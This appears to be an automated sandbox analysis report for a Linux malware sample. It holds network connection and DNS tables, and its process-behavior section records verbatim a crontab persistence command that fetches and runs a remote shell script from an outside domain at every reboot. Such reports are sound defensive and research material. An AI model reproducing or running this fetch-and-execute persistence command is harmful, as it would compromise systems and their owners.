Dec 18, 2024 00:04:19.604872942 CET | 58394 | 24738 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:19.724524021 CET | 24738 | 58394 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:19.724730968 CET | 58394 | 24738 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:19.844321012 CET | 24738 | 58394 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:21.903646946 CET | 24738 | 58394 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:21.903845072 CET | 58394 | 24738 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:22.023658037 CET | 24738 | 58394 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:22.459619045 CET | 16854 | 44076 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:22.459835052 CET | 44076 | 16854 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:22.459835052 CET | 44076 | 16854 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:27.148483992 CET | 46388 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:27.268528938 CET | 5956 | 46388 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:27.268822908 CET | 46388 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:27.268822908 CET | 46388 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:27.388942957 CET | 5956 | 46388 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:27.389122963 CET | 46388 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:27.512598038 CET | 5956 | 46388 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:27.709716082 CET | 46390 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:27.829610109 CET | 5956 | 46390 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:27.829799891 CET | 46390 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:27.830216885 CET | 46390 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:27.950114965 CET | 5956 | 46390 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:27.950376987 CET | 46390 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:28.070947886 CET | 5956 | 46390 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:29.597229958 CET | 5956 | 46388 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:29.597743988 CET | 46388 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:29.717663050 CET | 5956 | 46388 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:30.149797916 CET | 5956 | 46390 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:30.150448084 CET | 46390 | 5956 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:30.270299911 CET | 5956 | 46390 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:34.844600916 CET | 33668 | 20767 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:34.966602087 CET | 20767 | 33668 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:34.966911077 CET | 33668 | 20767 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:34.967003107 CET | 33668 | 20767 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:35.086558104 CET | 20767 | 33668 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:35.086750984 CET | 33668 | 20767 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:35.206341982 CET | 20767 | 33668 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:35.392474890 CET | 39870 | 20767 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:35.512146950 CET | 20767 | 39870 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:35.512281895 CET | 39870 | 20767 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:35.512393951 CET | 39870 | 20767 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:35.632029057 CET | 20767 | 39870 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:35.632167101 CET | 39870 | 20767 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:35.751962900 CET | 20767 | 39870 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:36.816515923 CET | 20767 | 39870 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:36.816972017 CET | 39870 | 20767 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:36.816972017 CET | 39870 | 20767 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:37.268709898 CET | 20767 | 33668 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:37.269216061 CET | 33668 | 20767 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:37.388856888 CET | 20767 | 33668 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:42.087692022 CET | 51184 | 3266 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:42.207379103 CET | 3266 | 51184 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:42.207582951 CET | 51184 | 3266 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:42.207673073 CET | 51184 | 3266 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:42.327832937 CET | 3266 | 51184 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:42.328002930 CET | 51184 | 3266 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:42.447721004 CET | 3266 | 51184 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:44.534785986 CET | 3266 | 51184 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:44.535099030 CET | 51184 | 3266 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:44.654727936 CET | 3266 | 51184 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:49.777419090 CET | 58260 | 25509 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:49.897169113 CET | 25509 | 58260 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:49.897299051 CET | 58260 | 25509 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:49.897300005 CET | 58260 | 25509 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:50.016913891 CET | 25509 | 58260 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:50.017039061 CET | 58260 | 25509 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:50.137056112 CET | 25509 | 58260 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:52.200778008 CET | 25509 | 58260 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:52.201040030 CET | 58260 | 25509 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:52.320774078 CET | 25509 | 58260 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:52.530570984 CET | 48560 | 3266 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:52.650338888 CET | 3266 | 48560 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:52.650536060 CET | 48560 | 3266 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:52.650640011 CET | 48560 | 3266 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:52.770307064 CET | 3266 | 48560 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:52.770591021 CET | 48560 | 3266 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:52.890245914 CET | 3266 | 48560 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:57.449186087 CET | 32878 | 13872 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:57.568799019 CET | 13872 | 32878 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:57.568967104 CET | 32878 | 13872 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:57.569036007 CET | 32878 | 13872 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:57.688656092 CET | 13872 | 32878 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:57.688837051 CET | 32878 | 13872 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:57.808680058 CET | 13872 | 32878 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:05:01.870279074 CET | 13872 | 32878 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:05:01.870450974 CET | 32878 | 13872 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:05:01.870495081 CET | 32878 | 13872 | 192.168.2.23 | 80.78.26.121 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 18, 2024 00:02:56.552985907 CET | 52412 | 53 | 192.168.2.23 | 178.254.22.166 |
Dec 18, 2024 00:02:56.634915113 CET | 42256 | 53 | 192.168.2.23 | 178.254.22.166 |
Dec 18, 2024 00:03:01.559238911 CET | 55228 | 53 | 192.168.2.23 | 185.181.61.24 |
Dec 18, 2024 00:03:01.640480995 CET | 38570 | 53 | 192.168.2.23 | 185.181.61.24 |
Dec 18, 2024 00:03:01.820256948 CET | 53 | 55228 | 185.181.61.24 | 192.168.2.23 |
Dec 18, 2024 00:03:01.898901939 CET | 53 | 38570 | 185.181.61.24 | 192.168.2.23 |
Dec 18, 2024 00:03:09.332469940 CET | 43717 | 53 | 192.168.2.23 | 5.161.109.23 |
Dec 18, 2024 00:03:14.339279890 CET | 59091 | 53 | 192.168.2.23 | 64.176.6.48 |
Dec 18, 2024 00:03:19.345571995 CET | 48242 | 53 | 192.168.2.23 | 178.254.22.166 |
Dec 18, 2024 00:03:24.351927042 CET | 47337 | 53 | 192.168.2.23 | 137.220.52.23 |
Dec 18, 2024 00:03:28.839308977 CET | 53210 | 53 | 192.168.2.23 | 5.161.109.23 |
Dec 18, 2024 00:03:33.845861912 CET | 34736 | 53 | 192.168.2.23 | 64.176.6.48 |
Dec 18, 2024 00:03:36.814120054 CET | 36450 | 53 | 192.168.2.23 | 178.254.22.166 |
Dec 18, 2024 00:03:38.852448940 CET | 56076 | 53 | 192.168.2.23 | 178.254.22.166 |
Dec 18, 2024 00:03:41.820401907 CET | 34884 | 53 | 192.168.2.23 | 152.53.15.127 |
Dec 18, 2024 00:03:42.063971996 CET | 53 | 34884 | 152.53.15.127 | 192.168.2.23 |
Dec 18, 2024 00:03:43.858772993 CET | 48638 | 53 | 192.168.2.23 | 137.220.52.23 |
Dec 18, 2024 00:03:48.490120888 CET | 33974 | 53 | 192.168.2.23 | 51.158.108.203 |
Dec 18, 2024 00:03:48.729135990 CET | 53 | 33974 | 51.158.108.203 | 192.168.2.23 |
Dec 18, 2024 00:03:56.163871050 CET | 40337 | 53 | 192.168.2.23 | 51.158.108.203 |
Dec 18, 2024 00:03:56.402832031 CET | 53 | 40337 | 51.158.108.203 | 192.168.2.23 |
Dec 18, 2024 00:03:58.298536062 CET | 39335 | 53 | 192.168.2.23 | 178.254.22.166 |
Dec 18, 2024 00:04:03.304677963 CET | 40132 | 53 | 192.168.2.23 | 152.53.15.127 |
Dec 18, 2024 00:04:03.546899080 CET | 53 | 40132 | 152.53.15.127 | 192.168.2.23 |
Dec 18, 2024 00:04:03.827771902 CET | 41029 | 53 | 192.168.2.23 | 152.53.15.127 |
Dec 18, 2024 00:04:04.075582981 CET | 53 | 41029 | 152.53.15.127 | 192.168.2.23 |
Dec 18, 2024 00:04:09.976389885 CET | 41257 | 53 | 192.168.2.23 | 51.158.108.203 |
Dec 18, 2024 00:04:10.216341972 CET | 53 | 41257 | 51.158.108.203 | 192.168.2.23 |
Dec 18, 2024 00:04:11.500499010 CET | 35417 | 53 | 192.168.2.23 | 217.160.70.42 |
Dec 18, 2024 00:04:11.739270926 CET | 53 | 35417 | 217.160.70.42 | 192.168.2.23 |
Dec 18, 2024 00:04:17.706649065 CET | 59828 | 53 | 192.168.2.23 | 51.158.108.203 |
Dec 18, 2024 00:04:17.946346998 CET | 53 | 59828 | 51.158.108.203 | 192.168.2.23 |
Dec 18, 2024 00:04:19.218522072 CET | 35567 | 53 | 192.168.2.23 | 65.21.1.106 |
Dec 18, 2024 00:04:19.483758926 CET | 53 | 35567 | 65.21.1.106 | 192.168.2.23 |
Dec 18, 2024 00:04:26.907639027 CET | 55304 | 53 | 192.168.2.23 | 51.158.108.203 |
Dec 18, 2024 00:04:27.147325993 CET | 53 | 55304 | 51.158.108.203 | 192.168.2.23 |
Dec 18, 2024 00:04:27.462913990 CET | 57954 | 53 | 192.168.2.23 | 152.53.15.127 |
Dec 18, 2024 00:04:27.707247019 CET | 53 | 57954 | 152.53.15.127 | 192.168.2.23 |
Dec 18, 2024 00:04:34.600979090 CET | 58954 | 53 | 192.168.2.23 | 202.61.197.122 |
Dec 18, 2024 00:04:34.842796087 CET | 53 | 58954 | 202.61.197.122 | 192.168.2.23 |
Dec 18, 2024 00:04:35.152874947 CET | 59678 | 53 | 192.168.2.23 | 217.160.70.42 |
Dec 18, 2024 00:04:35.391486883 CET | 53 | 59678 | 217.160.70.42 | 192.168.2.23 |
Dec 18, 2024 00:04:41.821958065 CET | 53945 | 53 | 192.168.2.23 | 65.21.1.106 |
Dec 18, 2024 00:04:42.086241007 CET | 53 | 53945 | 65.21.1.106 | 192.168.2.23 |
Dec 18, 2024 00:04:42.273092031 CET | 46706 | 53 | 192.168.2.23 | 70.34.254.19 |
Dec 18, 2024 00:04:47.278882980 CET | 52840 | 53 | 192.168.2.23 | 137.220.52.23 |
Dec 18, 2024 00:04:49.537367105 CET | 40175 | 53 | 192.168.2.23 | 51.158.108.203 |
Dec 18, 2024 00:04:49.776453018 CET | 53 | 40175 | 51.158.108.203 | 192.168.2.23 |
Dec 18, 2024 00:04:52.284758091 CET | 46131 | 53 | 192.168.2.23 | 202.61.197.122 |
Dec 18, 2024 00:04:52.529372931 CET | 53 | 46131 | 202.61.197.122 | 192.168.2.23 |
Dec 18, 2024 00:04:57.203093052 CET | 33312 | 53 | 192.168.2.23 | 202.61.197.122 |
Dec 18, 2024 00:04:57.448103905 CET | 53 | 33312 | 202.61.197.122 | 192.168.2.23 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 18, 2024 00:02:56.552985907 CET | 192.168.2.23 | 178.254.22.166 | 0x6ba6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:02:56.634915113 CET | 192.168.2.23 | 178.254.22.166 | 0x6ba6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:01.559238911 CET | 192.168.2.23 | 185.181.61.24 | 0x3f17 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:01.640480995 CET | 192.168.2.23 | 185.181.61.24 | 0x3f17 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:09.332469940 CET | 192.168.2.23 | 5.161.109.23 | 0xfe4d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:14.339279890 CET | 192.168.2.23 | 64.176.6.48 | 0x8736 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:19.345571995 CET | 192.168.2.23 | 178.254.22.166 | 0x6ccb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:24.351927042 CET | 192.168.2.23 | 137.220.52.23 | 0xcd70 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:28.839308977 CET | 192.168.2.23 | 5.161.109.23 | 0xfe4d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:33.845861912 CET | 192.168.2.23 | 64.176.6.48 | 0x8736 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:36.814120054 CET | 192.168.2.23 | 178.254.22.166 | 0x9dca | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:38.852448940 CET | 192.168.2.23 | 178.254.22.166 | 0x6ccb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:41.820401907 CET | 192.168.2.23 | 152.53.15.127 | 0x984a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:43.858772993 CET | 192.168.2.23 | 137.220.52.23 | 0xcd70 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:48.490120888 CET | 192.168.2.23 | 51.158.108.203 | 0xcdd1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:56.163871050 CET | 192.168.2.23 | 51.158.108.203 | 0x56cb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:03:58.298536062 CET | 192.168.2.23 | 178.254.22.166 | 0x9dca | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:03.304677963 CET | 192.168.2.23 | 152.53.15.127 | 0x984a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:03.827771902 CET | 192.168.2.23 | 152.53.15.127 | 0x2022 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:09.976389885 CET | 192.168.2.23 | 51.158.108.203 | 0xcdd1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:11.500499010 CET | 192.168.2.23 | 217.160.70.42 | 0x3763 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:17.706649065 CET | 192.168.2.23 | 51.158.108.203 | 0x56cb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:19.218522072 CET | 192.168.2.23 | 65.21.1.106 | 0xecac | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:26.907639027 CET | 192.168.2.23 | 51.158.108.203 | 0x437 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:27.462913990 CET | 192.168.2.23 | 152.53.15.127 | 0x2022 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:34.600979090 CET | 192.168.2.23 | 202.61.197.122 | 0x9d06 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:35.152874947 CET | 192.168.2.23 | 217.160.70.42 | 0x3763 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:41.821958065 CET | 192.168.2.23 | 65.21.1.106 | 0xecac | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:42.273092031 CET | 192.168.2.23 | 70.34.254.19 | 0x2285 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:47.278882980 CET | 192.168.2.23 | 137.220.52.23 | 0x8050 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:49.537367105 CET | 192.168.2.23 | 51.158.108.203 | 0x437 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:52.284758091 CET | 192.168.2.23 | 202.61.197.122 | 0x5214 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 18, 2024 00:04:57.203093052 CET | 192.168.2.23 | 202.61.197.122 | 0x9d06 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 18, 2024 00:03:01.820256948 CET | 185.181.61.24 | 192.168.2.23 | 0x3f17 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:03:01.820256948 CET | 185.181.61.24 | 192.168.2.23 | 0x3f17 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:03:01.898901939 CET | 185.181.61.24 | 192.168.2.23 | 0x3f17 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:03:01.898901939 CET | 185.181.61.24 | 192.168.2.23 | 0x3f17 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:03:42.063971996 CET | 152.53.15.127 | 192.168.2.23 | 0x984a | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:03:42.063971996 CET | 152.53.15.127 | 192.168.2.23 | 0x984a | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:03:48.729135990 CET | 51.158.108.203 | 192.168.2.23 | 0xcdd1 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:03:48.729135990 CET | 51.158.108.203 | 192.168.2.23 | 0xcdd1 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:03:56.402832031 CET | 51.158.108.203 | 192.168.2.23 | 0x56cb | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:03:56.402832031 CET | 51.158.108.203 | 192.168.2.23 | 0x56cb | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:03.546899080 CET | 152.53.15.127 | 192.168.2.23 | 0x984a | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:03.546899080 CET | 152.53.15.127 | 192.168.2.23 | 0x984a | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:04.075582981 CET | 152.53.15.127 | 192.168.2.23 | 0x2022 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:04.075582981 CET | 152.53.15.127 | 192.168.2.23 | 0x2022 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:10.216341972 CET | 51.158.108.203 | 192.168.2.23 | 0xcdd1 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:10.216341972 CET | 51.158.108.203 | 192.168.2.23 | 0xcdd1 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:11.739270926 CET | 217.160.70.42 | 192.168.2.23 | 0x3763 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:11.739270926 CET | 217.160.70.42 | 192.168.2.23 | 0x3763 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:17.946346998 CET | 51.158.108.203 | 192.168.2.23 | 0x56cb | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:17.946346998 CET | 51.158.108.203 | 192.168.2.23 | 0x56cb | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:19.483758926 CET | 65.21.1.106 | 192.168.2.23 | 0xecac | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:19.483758926 CET | 65.21.1.106 | 192.168.2.23 | 0xecac | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:27.147325993 CET | 51.158.108.203 | 192.168.2.23 | 0x437 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:27.147325993 CET | 51.158.108.203 | 192.168.2.23 | 0x437 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:27.707247019 CET | 152.53.15.127 | 192.168.2.23 | 0x2022 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:27.707247019 CET | 152.53.15.127 | 192.168.2.23 | 0x2022 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:34.842796087 CET | 202.61.197.122 | 192.168.2.23 | 0x9d06 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:34.842796087 CET | 202.61.197.122 | 192.168.2.23 | 0x9d06 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:35.391486883 CET | 217.160.70.42 | 192.168.2.23 | 0x3763 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:35.391486883 CET | 217.160.70.42 | 192.168.2.23 | 0x3763 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:42.086241007 CET | 65.21.1.106 | 192.168.2.23 | 0xecac | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:42.086241007 CET | 65.21.1.106 | 192.168.2.23 | 0xecac | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:49.776453018 CET | 51.158.108.203 | 192.168.2.23 | 0x437 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:49.776453018 CET | 51.158.108.203 | 192.168.2.23 | 0x437 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:52.529372931 CET | 202.61.197.122 | 192.168.2.23 | 0x5214 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:52.529372931 CET | 202.61.197.122 | 192.168.2.23 | 0x5214 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:57.448103905 CET | 202.61.197.122 | 192.168.2.23 | 0x9d06 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 18, 2024 00:04:57.448103905 CET | 202.61.197.122 | 192.168.2.23 | 0x9d06 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkppc.elf |
Arguments: | /tmp/nshkppc.elf |
File size: | 5388968 bytes |
MD5 hash: | ae65271c943d3451b7f026d1fadccea6 |
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkppc.elf |
Arguments: | - |
File size: | 5388968 bytes |
MD5 hash: | ae65271c943d3451b7f026d1fadccea6 |
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkppc.elf |
Arguments: | - |
File size: | 5388968 bytes |
MD5 hash: | ae65271c943d3451b7f026d1fadccea6 |
Start time (UTC): | 23:02:56 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkppc.elf |
Arguments: | - |
File size: | 5388968 bytes |
MD5 hash: | ae65271c943d3451b7f026d1fadccea6 |
Start time (UTC): | 23:02:55 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkppc.elf |
Arguments: | - |
File size: | 5388968 bytes |
MD5 hash: | ae65271c943d3451b7f026d1fadccea6 |